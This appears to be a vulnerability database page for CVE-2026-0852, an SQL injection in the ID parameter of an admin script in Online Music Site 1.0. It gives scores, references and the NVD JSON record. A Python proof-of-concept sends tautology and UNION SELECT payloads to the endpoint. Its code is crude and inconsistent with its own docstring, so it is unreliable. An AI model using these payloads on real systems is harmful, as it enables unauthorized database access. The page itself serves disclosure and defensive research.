CVE-2026-0852

Description

A security flaw has been discovered in code-projects Online Music Site 1.0. The impacted element is an unknown function of the file /Administrator/PHP/AdminUpdateUser.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks.

CVSS Details

CVSS Score

7.3

Severity

HIGH

CVSS Vector

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:fabian:online_music_site:1.0:*:*:*:*:*:*:* - VULNERABLE

code-projects Online Music Site 1.0

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

import requests
import sys

# CVE-2026-0852 SQL Injection PoC
# Target: code-projects Online Music Site 1.0
# Endpoint: /Administrator/PHP/AdminUpdateUser.php

def exploit_sqli(target_url, param_id):
    """
    SQL Injection PoC for CVE-2026-0852
    This PoC demonstrates blind boolean-based SQL injection
    """
    # Basic injection test - check for error response
    injection_test = "' OR '1'='1"
    url = f"{target_url}/Administrator/PHP/AdminUpdateUser.php"
    
    # Test 1: Basic error-based injection
    params = {'ID': injection_test}
    try:
        response = requests.get(url, params=params, timeout=10)
        if 'sql' in response.text.lower() or 'error' in response.text.lower():
            print("[+] SQL Injection vulnerability confirmed!")
            return True
    except Exception as e:
        print(f"[-] Request failed: {e}")
    
    # Test 2: UNION-based injection to extract database version
    union_payload = "' UNION SELECT NULL,version(),NULL,NULL---"
    params = {'ID': union_payload}
    try:
        response = requests.get(url, params=params, timeout=10)
        if '5.' in response.text or '8.' in response.text:
            print("[+] Database version extracted successfully")
    except Exception as e:
        print(f"[-] Error: {e}")
    
    return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python cve-2026-0852.py <target_url>")
        print("Example: python cve-2026-0852.py http://localhost/OnlineMusicSite")
        sys.exit(1)
    
    target = sys.argv[1]
    print(f"[*] Testing CVE-2026-0852 on {target}")
    exploit_sqli(target, "1")

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2026-0852
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2026-0852
[3] CVE Details https://www.cvedetails.com/cve/CVE-2026-0852/
[4] VulDB https://vuldb.com/cve/CVE-2026-0852
[5] https://code-projects.org/
[6] https://github.com/Learner636/CVE-smbmit/issues/2
[7] https://vuldb.com/?ctiid.340447
[8] https://vuldb.com/?id.340447
[9] https://vuldb.com/?submit.734136

Raw JSON Data

JSON

{"cve": {"id": "CVE-2026-0852", "sourceIdentifier": "[email protected]", "published": "2026-01-12T01:15:49.950", "lastModified": "2026-04-29T01:00:01.613", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "A security flaw has been discovered in code-projects Online Music Site 1.0. The impacted element is an unknown function of the file /Administrator/PHP/AdminUpdateUser.php. The manipulation of the argument ID results in sql injection. The attack can be executed remotely. The exploit has been released to the public and may be used for attacks."}, {"lang": "es", "value": "Una falla de seguridad ha sido descubierta en code-projects Online Music Site 1.0. El elemento afectado es una función desconocida del archivo /Administrator/PHP/AdminUpdateUser.php. La manipulación del argumento ID resulta en inyección SQL. El ataque puede ser ejecutado remotamente. El exploit ha sido publicado al público y puede ser utilizado para ataques."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:P/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "NONE", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "LOW", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "PROOF_OF_CONCEPT", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L", "baseScore": 7.3, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "LOW"}, "exploitabilityScore": 3.9, "impactScore": 3.4}, {"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "baseScore": 9.8, "baseSeverity": "CRITICAL", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "HIGH", "availabilityImpact": "HIGH"}, "exploitabilityScore": 3.9, "impactScore": 5.9}], "cvssMetricV2": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "2.0", "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "baseScore": 7.5, "accessVector": "NETWORK", "accessComplexity": "LOW", "authentication": "NONE", "confidentialityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "availabilityImpact": "PARTIAL"}, "baseSeverity": "HIGH", "exploitabilityScore": 10.0, "impactScore": 6.4, "acInsufInfo": false, "obtainAllPrivilege": false, "obtainUserPrivilege": false, "obtainOtherPrivilege": false, "userInteractionRequired": false}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-74"}, {"lang": "en", "value": "CWE-89"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:fabian:online_music_site:1.0:*:*:*:*:*:*:*", "matchCriteriaId": "EEE01F25-5D13-4657-A849-2AA9890C8510"}]}]}], "references": [{"url": "https://code-projects.org/", "source": "[email protected]", "tags": ["Product"]}, {"url": "https://github.com/Learner636/CVE-smbmit/issues/2", "source": "[email protected]", "tags": ["Exploit", "Issue Tracking"]}, {"url": "https://vuldb.com/?ctiid.340447", "source": "[email protected]", "tags": ["Permissions Required", "VDB Entry"]}, {"url": "https://vuldb.com/?id.340447", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}, {"url": "https://vuldb.com/?submit.734136", "source": "[email protected]", "tags": ["Third Party Advisory", "VDB Entry"]}]}}